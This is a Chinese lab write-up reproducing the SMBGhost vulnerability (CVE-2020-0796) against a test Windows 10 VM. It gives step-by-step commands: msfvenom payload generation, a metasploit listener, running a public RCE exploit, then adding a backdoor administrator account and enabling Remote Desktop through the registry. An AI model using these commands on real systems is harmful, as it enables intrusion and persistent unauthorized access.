CVE-2020-0796复现

 · 2020-6-8  ·次阅读


最近发布的一个Windows漏洞,有时间来复现一下

漏洞介绍

有关此漏洞的详细介绍:https://www.freebuf.com/vuls/233263.html

漏洞复现

利用Windows10 1903版本来进行复现

镜像下载与安装

镜像:ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|

安装镜像

1

虚拟机信息

Windows10 1903版本

ip:192.168.1.104

漏洞扫描

攻击机

工具:SMBGhost

python3 scanner.py 192.168.1.104

2

靶机

工具:奇安信检测工具

3

使用metasploit生成buf

msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -f py -o tool.py 

4

将SMBGhost_RCE_PoC中的exploit.py中的USER_OAYLOAD更换为刚刚生成的buf

5

使用metasploit对6666端口进行监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
show options
set LPORT 6666
set RHOST 192.168.1.104
exploit

6

运行exploit.py

python3 exploit.py -ip 192.168.1.104

7

这里打下去靶机会出现蓝屏重启的现象,多试几次就好

8

拿到shell

提权

添加用户

net user d1a0 password /add

加入管理组

net localgroup Administrators d1a0 /add
net localgroup Users d1a0 /del

查看用户信息

net user

9

开启远程连接功能

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

10

11

12

工具地址:

SMBGhost:https://github.com/ollypwn/SMBGhost

奇安信检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

SMBGhost_RCE_PoC:https://github.com/chompie1337/SMBGhost_RCE_PoC.git